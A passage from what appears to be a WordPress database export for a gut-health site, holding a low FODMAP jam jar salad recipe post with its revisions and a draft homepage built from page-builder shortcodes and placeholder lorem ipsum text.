','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','publish','open','open','','title-unlocking-the-power-of-enzymes-natures-catalysts-for-vital-processes','','','2023-10-12 09:07:03','2023-10-12 09:07:03','',0,'https://tummyrevolution.com/?p=5446',0,'post','',0),(5422,1,'2020-04-29 10:51:15','2020-04-29 10:51:15','[vc_row][vc_column][vc_gallery interval=\"3\" images=\"5421,5418,5420\" img_size=\"large\" onclick=\"custom_link\" custom_links_target=\"_blank\" custom_links=\"#E-8_aHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvbSUyRlR1bW15LVJldm9sdXRpb24taGVhbHRoLW1hZGUtc2ltcGxlLWVib29rJTJGZHAlMkZCMDdIUkZES0MxJTJDaHR0cHMlM0ElMkYlMkZ3d3cuYW1hem9uLmNvLnVrJTJGVHVtbXktUmV2b2x1dGlvbi1oZWFsdGgtbWFkZS1zaW1wbGUtZWJvb2slMkZkcCUyRkIwN0hSRkRLQzElMkZyZWYlM0Rzcl8xXzElM0ZpZSUzRFVURjglMjZxaWQlM0QxNTQzNjQ1ODAyJTI2c3IlM0Q4LTElMjZrZXl3b3JkcyUzRHR1bW15JTJCcmV2b2x1dGlvbiUyQjIxJTI1MkMlMkJndXQlMkJoZWFsdGglMkNodHRwcyUzQSUyRiUyRml0dW5lcy5hcHBsZS5jb20lMkZhdSUyRmJvb2slMkZ0dW1teS1yZXZvbHV0aW9uLTIxLWd1dC1oZWFsdGgtbWFkZS1zaW1wbGUlMkZpZDE0NDQ1NTE5ODIlM0ZtdCUzRDEx\"][vc_empty_space][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1588157289763-4833a7b8-ea6e-5\" taxonomies=\"92\"][/vc_column][/vc_row][vc_row][vc_column][vc_btn title=\"Load More Recipes\" color=\"juicy-pink\" align=\"center\" link=\"url:http%3A%2F%2Ftummyrevolution.com%2Frecipe-list%2Fpage%2F2%2F|title:Recipe%20List||\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-29 10:51:15','2020-04-29 10:51:15','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5435,1,'2023-08-22 13:12:46','2023-08-22 13:12:46','\n

Planning is key when you are on the low FODMAP diet and you will need to prepare meals such as a packed lunch at some point as it\'s hard to find healthy, tummy-friendly alternatives at convenience stores. These jam jar salads are ideal on-the-go meals full of colour, nutrition and flavour. Don\'t you think they look great too? You can prepare them in in batches cut as a few of one type or all three. They keep well in the fridge for a few days making it easier for you to be well prepared for a week ahead. 

\n\n\n\n

Pasta Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  •  Bottom layer (dressing): 1 tbsp olive oil, 1 tsp white wine vinegar, ½ tsp mustard, juice of ½ a lemon, salt & pepper
  • \n\n\n\n
  • Second layer: cooked gluten free pasta
  • \n\n\n\n
  • Third layer: ¼ cup (50g) red cabbage, shredded
  • \n\n\n\n
  • Fourth layer: 1 carrot, shredded
  • \n\n\n\n
  • Fifth layer: 4 cherry tomatoes, sliced in half or quarters
  • \n\n\n\n
  • Sixth layer: 5cm piece of cucumber, chopped
  • \n\n\n\n
  • Seventh layer: 1 spring onion (green part only) finely sliced
  • \n\n\n\n
  • Eight layer: 1 small handful walnuts
  • \n\n\n\n
  • Top layer: 1 handful rocket leaves
  • \n
\n\n\n\n

Instructions
1. Mix the ingredients for the dressing together and pour it into the jar/container.

\n\n\n\n

2. Cook the pasta in salted water according to package instructions. Drain and rinse with cold water. Spoon the pasta into the jar.

\n\n\n\n

3. Shred the red cabbage and place on top of the pasta.

\n\n\n\n

4. Shred one carrot and add to the jar.

\n\n\n\n

5. Add the chopped tomatoes followed by the chopped cucumber, spring onion (green part), and walnuts.

\n\n\n\n

6. Finish off by adding the rocket leaves.

\n\n\n\n

7. Seal the jar and store in the fridge.

\n\n\n\n

Roasted Pumpkin and Feta Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  • Bottom layer (dressing): 1 tbsp olive oil, 1 tsp white wine vinegar, ½tsp mustard, juice of ½ a lemon, salt & pepper
  • \n\n\n\n
  • Second layer: ½cup (90g) cooked quinoa or ¼ cup (45g) uncooked quinoa
  • \n\n\n\n
  • Third layer: ¼ cup (50g) pumpkin, roasted
  • \n\n\n\n
  • Fourth layer: ¼cup (50g) feta cheese, crumbled
  • \n\n\n\n
  • Fifth layer: 1 handful mixed seeds
  • \n\n\n\n
  • Sixth layer: 1 handful grapes
  • \n\n\n\n
  • Top layer: 1 handful kale
  • \n
\n\n\n\n

 Instructions
1. Preheat the oven to 200C° (400F°).

2. Mix the ingredients for the dressing together and pour it into the jar.

3. If you have some quinoa left from previous lunches add about ½cup to the jar.

\n\n\n\n

4. If you need to make fresh quinoa, bring 1 cup (200ml) of water to boil in a saucepan. Rinse the quinoa and add to the boiling water. Let it simmer for 15-20 minutes. Add more water if needed. Rinse the quinoa in cold water and let it drain well. Add it to the jar.

\n\n\n\n

5. Peel and cut the pumpkin into small chunks and place on a baking tray. Drizzle over some olive oil and season with salt and pepper. Place in oven to roast for about 15-20 minutes. Remove the vegetables from the oven once roasted and let them cool and add to the jar.

6. Add the crumbled feta cheese followed by the seeds.

7. Cut the grapes in half and add them to the jar. 

8. Shred and blanch the kale for a few seconds in hot water. Drain and add to the jar.

9. Seal the jar and store in the fridge.

\n\n\n\n

\n\n\n\n

Smoked Salmon and Egg Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  • Bottom layer (dressing): 1 tbsp lactose free plain yoghurt, 1 tsp mayonnaise, juice of ½lemon, salt and pepper
  • \n\n\n\n
  • Second layer: ½ cup (90g) cooked quinoa or 1/4cup (45g) uncooked quinoa
  • \n\n\n\n
  • Third layer: 1 boiled egg cut in quarters
  • \n\n\n\n
  • Fourth layer: 100g smoked salmon
  • \n\n\n\n
  • Fifth layer: 5 cm piece of a cucumber, chopped
  • \n\n\n\n
  • Sixth layer: ¼ cup (50g) feta cheese, crumbled
  • \n\n\n\n
  • Seventh layer: small handful walnuts
  • \n\n\n\n
  • Eight layer: a little bit freshly chopped dill and chives
  • \n\n\n\n
  • Top layer: lettuce
  • \n
\n\n\n\n

Instructions
1. Mix the ingredients for the dressing together and pour it into the jar.

2. If you have some quinoa left from previous lunches add ½cup to the jar. If you need to make fresh quinoa, bring 1 cup (200ml) of water to boil in a saucepan. Rinse the quinoa and add to the boiling water. Let it simmer for 15-20 minutes. Add more water if needed. Rinse the quinoa in cold water and let it drain well. Add to the jar. 

3. In another saucepan bring 2 cups (500 ml) of water to boil. Add the egg and simmer under low heat for about 6-8 minutes. Remove from the stove and drain off the hot water. Cover the egg with cold water and let it sit for a couple of minutes. Peel the egg under cold running water and cut into quarters. Add to the jar.

4. Add the smoked salmon followed by the chopped cucumber, crumbled feta and walnuts.

\n\n\n\n

5. Finish off by adding dill, chives and lettuce.

6. Seal the jar and store in the fridge.

\n','Jam Jar Salad 3 Ways','','publish','open','open','','jam-jar-salad-3-ways','','','2023-08-22 13:12:48','2023-08-22 13:12:48','',0,'https://tummyrevolution.com/?p=5435',0,'post','',0),(5436,1,'2023-08-22 13:11:08','2023-08-22 13:11:08','\n

Planning is key when you are on the low FODMAP diet and you will need to prepare meals such as a packed lunch at some point as it\'s hard to find healthy, tummy-friendly alternatives at convenience stores. These jam jar salads are ideal on-the-go meals full of colour, nutrition and flavour. Don\'t you think they look great too? You can prepare them in in batches cut as a few of one type or all three. They keep well in the fridge for a few days making it easier for you to be well prepared for a week ahead. 

\n\n\n\n

Pasta Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  •  Bottom layer (dressing): 1 tbsp olive oil, 1 tsp white wine vinegar, ½ tsp mustard, juice of ½ a lemon, salt & pepper
  • \n\n\n\n
  • Second layer: cooked gluten free pasta
  • \n\n\n\n
  • Third layer: ¼ cup (50g) red cabbage, shredded
  • \n\n\n\n
  • Fourth layer: 1 carrot, shredded
  • \n\n\n\n
  • Fifth layer: 4 cherry tomatoes, sliced in half or quarters
  • \n\n\n\n
  • Sixth layer: 5cm piece of cucumber, chopped
  • \n\n\n\n
  • Seventh layer: 1 spring onion (green part only) finely sliced
  • \n\n\n\n
  • Eight layer: 1 small handful walnuts
  • \n\n\n\n
  • Top layer: 1 handful rocket leaves
  • \n
\n\n\n\n

Instructions
1. Mix the ingredients for the dressing together and pour it into the jar/container.

\n\n\n\n

2. Cook the pasta in salted water according to package instructions. Drain and rinse with cold water. Spoon the pasta into the jar.

\n\n\n\n

3. Shred the red cabbage and place on top of the pasta.

\n\n\n\n

4. Shred one carrot and add to the jar.

\n\n\n\n

5. Add the chopped tomatoes followed by the chopped cucumber, spring onion (green part), and walnuts.

\n\n\n\n

6. Finish off by adding the rocket leaves.

\n\n\n\n

7. Seal the jar and store in the fridge.

\n\n\n\n

Roasted Pumpkin and Feta Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  • Bottom layer (dressing): 1 tbsp olive oil, 1 tsp white wine vinegar, ½tsp mustard, juice of ½ a lemon, salt & pepper
  • \n\n\n\n
  • Second layer: ½cup (90g) cooked quinoa or ¼ cup (45g) uncooked quinoa
  • \n\n\n\n
  • Third layer: ¼ cup (50g) pumpkin, roasted
  • \n\n\n\n
  • Fourth layer: ¼cup (50g) feta cheese, crumbled
  • \n\n\n\n
  • Fifth layer: 1 handful mixed seeds
  • \n\n\n\n
  • Sixth layer: 1 handful grapes
  • \n\n\n\n
  • Top layer: 1 handful kale
  • \n
\n\n\n\n

 Instructions
1. Preheat the oven to 200C° (400F°).

2. Mix the ingredients for the dressing together and pour it into the jar.

3. If you have some quinoa left from previous lunches add about ½cup to the jar.

\n\n\n\n

4. If you need to make fresh quinoa, bring 1 cup (200ml) of water to boil in a saucepan. Rinse the quinoa and add to the boiling water. Let it simmer for 15-20 minutes. Add more water if needed. Rinse the quinoa in cold water and let it drain well. Add it to the jar.

\n\n\n\n

5. Peel and cut the pumpkin into small chunks and place on a baking tray. Drizzle over some olive oil and season with salt and pepper. Place in oven to roast for about 15-20 minutes. Remove the vegetables from the oven once roasted and let them cool and add to the jar.

6. Add the crumbled feta cheese followed by the seeds.

7. Cut the grapes in half and add them to the jar. 

8. Shred and blanch the kale for a few seconds in hot water. Drain and add to the jar.

9. Seal the jar and store in the fridge.

\n\n\n\n

\n\n\n\n

Smoked Salmon and Egg Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  • Bottom layer (dressing): 1 tbsp lactose free plain yoghurt, 1 tsp mayonnaise, juice of ½lemon, salt and pepper
  • \n\n\n\n
  • Second layer: ½ cup (90g) cooked quinoa or 1/4cup (45g) uncooked quinoa
  • \n\n\n\n
  • Third layer: 1 boiled egg cut in quarters
  • \n\n\n\n
  • Fourth layer: 100g smoked salmon
  • \n\n\n\n
  • Fifth layer: 5 cm piece of a cucumber, chopped
  • \n\n\n\n
  • Sixth layer: ¼ cup (50g) feta cheese, crumbled
  • \n\n\n\n
  • Seventh layer: small handful walnuts
  • \n\n\n\n
  • Eight layer: a little bit freshly chopped dill and chives
  • \n\n\n\n
  • Top layer: lettuce
  • \n
\n\n\n\n

Instructions
1. Mix the ingredients for the dressing together and pour it into the jar.

2. If you have some quinoa left from previous lunches add ½cup to the jar. If you need to make fresh quinoa, bring 1 cup (200ml) of water to boil in a saucepan. Rinse the quinoa and add to the boiling water. Let it simmer for 15-20 minutes. Add more water if needed. Rinse the quinoa in cold water and let it drain well. Add to the jar. 

3. In another saucepan bring 2 cups (500 ml) of water to boil. Add the egg and simmer under low heat for about 6-8 minutes. Remove from the stove and drain off the hot water. Cover the egg with cold water and let it sit for a couple of minutes. Peel the egg under cold running water and cut into quarters. Add to the jar.

4. Add the smoked salmon followed by the chopped cucumber, crumbled feta and walnuts.

\n\n\n\n

5. Finish off by adding dill, chives and lettuce.

6. Seal the jar and store in the fridge.

\n','Jam Jar salad 3 ways #2','','inherit','closed','closed','','5435-revision-v1','','','2023-08-22 13:11:08','2023-08-22 13:11:08','',5435,'https://tummyrevolution.com/?p=5436',0,'revision','',0),(5437,1,'2023-08-22 13:12:46','2023-08-22 13:12:46','\n

Planning is key when you are on the low FODMAP diet and you will need to prepare meals such as a packed lunch at some point as it\'s hard to find healthy, tummy-friendly alternatives at convenience stores. These jam jar salads are ideal on-the-go meals full of colour, nutrition and flavour. Don\'t you think they look great too? You can prepare them in in batches cut as a few of one type or all three. They keep well in the fridge for a few days making it easier for you to be well prepared for a week ahead. 

\n\n\n\n

Pasta Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  •  Bottom layer (dressing): 1 tbsp olive oil, 1 tsp white wine vinegar, ½ tsp mustard, juice of ½ a lemon, salt & pepper
  • \n\n\n\n
  • Second layer: cooked gluten free pasta
  • \n\n\n\n
  • Third layer: ¼ cup (50g) red cabbage, shredded
  • \n\n\n\n
  • Fourth layer: 1 carrot, shredded
  • \n\n\n\n
  • Fifth layer: 4 cherry tomatoes, sliced in half or quarters
  • \n\n\n\n
  • Sixth layer: 5cm piece of cucumber, chopped
  • \n\n\n\n
  • Seventh layer: 1 spring onion (green part only) finely sliced
  • \n\n\n\n
  • Eight layer: 1 small handful walnuts
  • \n\n\n\n
  • Top layer: 1 handful rocket leaves
  • \n
\n\n\n\n

Instructions
1. Mix the ingredients for the dressing together and pour it into the jar/container.

\n\n\n\n

2. Cook the pasta in salted water according to package instructions. Drain and rinse with cold water. Spoon the pasta into the jar.

\n\n\n\n

3. Shred the red cabbage and place on top of the pasta.

\n\n\n\n

4. Shred one carrot and add to the jar.

\n\n\n\n

5. Add the chopped tomatoes followed by the chopped cucumber, spring onion (green part), and walnuts.

\n\n\n\n

6. Finish off by adding the rocket leaves.

\n\n\n\n

7. Seal the jar and store in the fridge.

\n\n\n\n

Roasted Pumpkin and Feta Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  • Bottom layer (dressing): 1 tbsp olive oil, 1 tsp white wine vinegar, ½tsp mustard, juice of ½ a lemon, salt & pepper
  • \n\n\n\n
  • Second layer: ½cup (90g) cooked quinoa or ¼ cup (45g) uncooked quinoa
  • \n\n\n\n
  • Third layer: ¼ cup (50g) pumpkin, roasted
  • \n\n\n\n
  • Fourth layer: ¼cup (50g) feta cheese, crumbled
  • \n\n\n\n
  • Fifth layer: 1 handful mixed seeds
  • \n\n\n\n
  • Sixth layer: 1 handful grapes
  • \n\n\n\n
  • Top layer: 1 handful kale
  • \n
\n\n\n\n

 Instructions
1. Preheat the oven to 200C° (400F°).

2. Mix the ingredients for the dressing together and pour it into the jar.

3. If you have some quinoa left from previous lunches add about ½cup to the jar.

\n\n\n\n

4. If you need to make fresh quinoa, bring 1 cup (200ml) of water to boil in a saucepan. Rinse the quinoa and add to the boiling water. Let it simmer for 15-20 minutes. Add more water if needed. Rinse the quinoa in cold water and let it drain well. Add it to the jar.

\n\n\n\n

5. Peel and cut the pumpkin into small chunks and place on a baking tray. Drizzle over some olive oil and season with salt and pepper. Place in oven to roast for about 15-20 minutes. Remove the vegetables from the oven once roasted and let them cool and add to the jar.

6. Add the crumbled feta cheese followed by the seeds.

7. Cut the grapes in half and add them to the jar. 

8. Shred and blanch the kale for a few seconds in hot water. Drain and add to the jar.

9. Seal the jar and store in the fridge.

\n\n\n\n

\n\n\n\n

Smoked Salmon and Egg Salad

\n\n\n\n
\"\"
\n\n\n\n

Ingredients

\n\n\n\n
    \n
  • Bottom layer (dressing): 1 tbsp lactose free plain yoghurt, 1 tsp mayonnaise, juice of ½lemon, salt and pepper
  • \n\n\n\n
  • Second layer: ½ cup (90g) cooked quinoa or 1/4cup (45g) uncooked quinoa
  • \n\n\n\n
  • Third layer: 1 boiled egg cut in quarters
  • \n\n\n\n
  • Fourth layer: 100g smoked salmon
  • \n\n\n\n
  • Fifth layer: 5 cm piece of a cucumber, chopped
  • \n\n\n\n
  • Sixth layer: ¼ cup (50g) feta cheese, crumbled
  • \n\n\n\n
  • Seventh layer: small handful walnuts
  • \n\n\n\n
  • Eight layer: a little bit freshly chopped dill and chives
  • \n\n\n\n
  • Top layer: lettuce
  • \n
\n\n\n\n

Instructions
1. Mix the ingredients for the dressing together and pour it into the jar.

2. If you have some quinoa left from previous lunches add ½cup to the jar. If you need to make fresh quinoa, bring 1 cup (200ml) of water to boil in a saucepan. Rinse the quinoa and add to the boiling water. Let it simmer for 15-20 minutes. Add more water if needed. Rinse the quinoa in cold water and let it drain well. Add to the jar. 

3. In another saucepan bring 2 cups (500 ml) of water to boil. Add the egg and simmer under low heat for about 6-8 minutes. Remove from the stove and drain off the hot water. Cover the egg with cold water and let it sit for a couple of minutes. Peel the egg under cold running water and cut into quarters. Add to the jar.

4. Add the smoked salmon followed by the chopped cucumber, crumbled feta and walnuts.

\n\n\n\n

5. Finish off by adding dill, chives and lettuce.

6. Seal the jar and store in the fridge.

\n','Jam Jar Salad 3 Ways','','inherit','closed','closed','','5435-revision-v1','','','2023-08-22 13:12:46','2023-08-22 13:12:46','',5435,'https://tummyrevolution.com/?p=5437',0,'revision','',0),(5438,1,'2023-08-24 16:13:27','0000-00-00 00:00:00','[vc_row][vc_column width=\"1/2\"][rev_slider alias=\"home1\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519125565610{padding-top: 96px !important;padding-bottom: 12px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 10px 0px 10px\" item_padding_680_768=\"0px 0px 60px 0px\" item_padding_680=\"0px 0px 14px 45px\"][qodef_single_image enable_image_shadow=\"no\" image=\"129\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-9 vc_col-md-offset-0 vc_col-md-9 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 0px 80px 8px\" item_padding_680=\"28px 0px 76px 0px\"][vc_column_text]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516619115957{margin-top: -6px !important;}\"]\n

Think With Heart

\n[/vc_column_text][vc_empty_space height=\"10px\"][qodef_single_image enable_image_shadow=\"no\" image=\"130\"][vc_empty_space height=\"5px\"][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using \'Content here, content here\', making it look like readable English. Many desktop publishing packages and web page.[/vc_column_text][vc_empty_space height=\"48px\"][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" number_of_columns=\"three\" space_between_items=\"small\" images=\"3951,3952,3953\" image_size=\"full\" custom_links=\"http://succulents.select-themes.com/summer-booze/, http://succulents.select-themes.com/fruit-salad/, http://succulents.select-themes.com/coconut-bombs/\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519140627330{padding-top: 144px !important;padding-bottom: 0px !important;}\" parallax_background_image=\"2278\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"164\" image_size=\"full\"][vc_column_text]\n

Make Every Bite Count

\n[/vc_column_text][vc_empty_space height=\"35px\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 26% 150px 26%\" item_padding_768_1024=\"0 16% 164px 16%\" item_padding_680_768=\"0 4% 186px 4%\" item_padding_680=\"0 0% 150px 0%\"][contact-form-7 id=\"159\" html_class=\"cf7_custom_style_1\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column offset=\"vc_col-lg-5 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"120px 10px 110px 0px\" item_padding_680_768=\"120px 10px 0px 0px\" item_padding_768_1024=\"120px 10px 55px 0px\" item_padding_680=\"100px 0px 28px 0px\"][qodef_single_image enable_image_shadow=\"no\" image=\"184\" image_size=\"full\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-7 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"99px 0px 0px 0px\" item_padding_680=\"0px 0px 100px 0px\" item_padding_680_768=\"48px 0px 100px 0px\" item_padding_768_1024=\"0px 0px 103px 0px\"][vc_column_text]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516618148023{margin-top: -11px !important;}\"]\n

Detox Plan SEVEN

\n[/vc_column_text][vc_empty_space height=\"6px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Mauris porta euismod lectus, finibus viverra dolor congue vitae. Integer ornare vulputate nunc et semper. Pellentesque consequat erat eros, sed maximus eros luctus eget, unc dapibus.[/vc_column_text][vc_empty_space height=\"18px\"][qodef_progress_bar title_tag=\"\" percent=\"38\" title=\"Aloe Shots\"][qodef_progress_bar title_tag=\"\" percent=\"53\" title=\"Smoothies\"][qodef_progress_bar title_tag=\"\" percent=\"67\" title=\"Veggie Wraps\"][qodef_progress_bar title_tag=\"\" percent=\"81\" title=\"Supplements\"][vc_empty_space height=\"49px\"][qodef_single_image enable_image_shadow=\"no\" image=\"291\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1519125692374{padding-top: 82px !important;padding-bottom: 73px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h1-img10.jpg?id=2753) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\" content_text_aligment=\"center\"][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3414\" image_size=\"full\" title=\"Detox Diet\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"1\"][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3415\" image_size=\"full\" title=\"Strong Excercize\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"2\"][vc_empty_space height=\"40px\"][/vc_column_inner][vc_column_inner width=\"2/3\" offset=\"vc_col-lg-offset-0 vc_col-lg-4 vc_col-md-offset-2 vc_col-md-8 vc_col-sm-offset-2 vc_col-xs-12\"][qodef_image_with_text enable_image_shadow=\"no\" title_tag=\"\" image=\"3412\" image_size=\"full\" title=\"Deep Hydration\" text=\"Lorem ipsum dolor sit amet, quot essent eam ei. Sed epicurei liberavisse in, vis fugit apeirian philosophia ad.\" background_text=\"3\"][vc_empty_space height=\"40px\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"2285\" css=\".vc_custom_1518176405299{padding-top: 57px !important;padding-bottom: 132px !important;}\"][vc_column][qodef_testimonials skin=\"light\" show_title=\"no\" show_image=\"no\" show_icon=\"yes\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"no\" slider_pagination=\"yes\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519124684606{padding-top: 88px !important;padding-bottom: 112px !important;}\"][vc_column][qodef_product_list number_of_columns=\"4\" space_between_items=\"tiny\" orderby=\"title\" order=\"ASC\" taxonomy_to_display=\"id\" image_size=\"\" number_of_posts=\"8\" taxonomy_values=\"1099, 1100, 1102, 1103, 1104, 1105, 1106, 1107\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"245\" css=\".vc_custom_1519121697188{padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"23px 20px 60px 0px\" item_padding_680=\"100px 0px 0px 0px\" item_padding_680_768=\"100px 0 0 0\" item_padding_768_1024=\"100px 123px 0px 0px\" item_padding_1024_1280=\"0px 0% 23px 84px\"][vc_column_text css_animation=\"none\"]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516615809885{margin-top: -10px !important;}\"]\n

Organic Soap

\n[/vc_column_text][vc_empty_space height=\"8px\"][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.[/vc_column_text][vc_empty_space height=\"28px\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"130px 0px 99px 88px\" item_padding_680=\"50px 0px 90px 0px\" item_padding_680_768=\"71px 0 100px 0px\" item_padding_768_1024=\"77px 0px 100px 0px\"][qodef_video_button video_link=\"https://vimeo.com/28781336\" video_image=\"246\" play_button_size=\"20px\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1519124340678{padding-top: 85px !important;}\"][vc_column][qodef_single_image enable_image_shadow=\"no\" image=\"166\" image_size=\"full\"][vc_empty_space height=\"13px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" title=\"Vegan Blogging\" subtitle=\"SWEET & HEALTY FOOD\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519124473237{padding-bottom: 63px !important;}\"][vc_column][vc_empty_space height=\"60px\"][qodef_blog_list type=\"standard\" number_of_columns=\"3\" space_between_items=\"small\" orderby=\"date\" order=\"DESC\" image_size=\"full\" number_of_posts=\"3\" category=\"pure\" excerpt_length=\"19\"][/vc_column][/vc_row]','jam jar 3 way Main Home #2','','draft','closed','closed','','main-home','','','2023-08-24 16:13:27','0000-00-00 00:00:00','',0,'https://tummyrevolution.com/?page_id=5438',0,'page','',0),(5439,1,'2023-08-24 16:15:12','2023-08-24 16:15:12','[vc_row][vc_column width=\"1/2\"][rev_slider alias=\"home1\"][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519125565610{padding-top: 96px !important;padding-bottom: 12px !important;}\"][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-3 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 10px 0px 10px\" item_padding_680_768=\"0px 0px 60px 0px\" item_padding_680=\"0px 0px 14px 45px\"][qodef_single_image enable_image_shadow=\"no\" image=\"129\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-9 vc_col-md-offset-0 vc_col-md-9 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 0px 80px 8px\" item_padding_680=\"28px 0px 76px 0px\"][vc_column_text]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516619115957{margin-top: -6px !important;}\"]\n

Think With Heart

\n[/vc_column_text][vc_empty_space height=\"10px\"][qodef_single_image enable_image_shadow=\"no\" image=\"130\"][vc_empty_space height=\"5px\"][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using \'Content here, content here\', making it look like readable English. Many desktop publishing packages and web page.[/vc_column_text][vc_empty_space height=\"48px\"][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" number_of_columns=\"three\" space_between_items=\"small\" images=\"3951,3952,3953\" image_size=\"full\" custom_links=\"http://succulents.select-themes.com/summer-booze/, http://succulents.select-themes.com/fruit-salad/, http://succulents.select-themes.com/coconut-bombs/\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"center\" 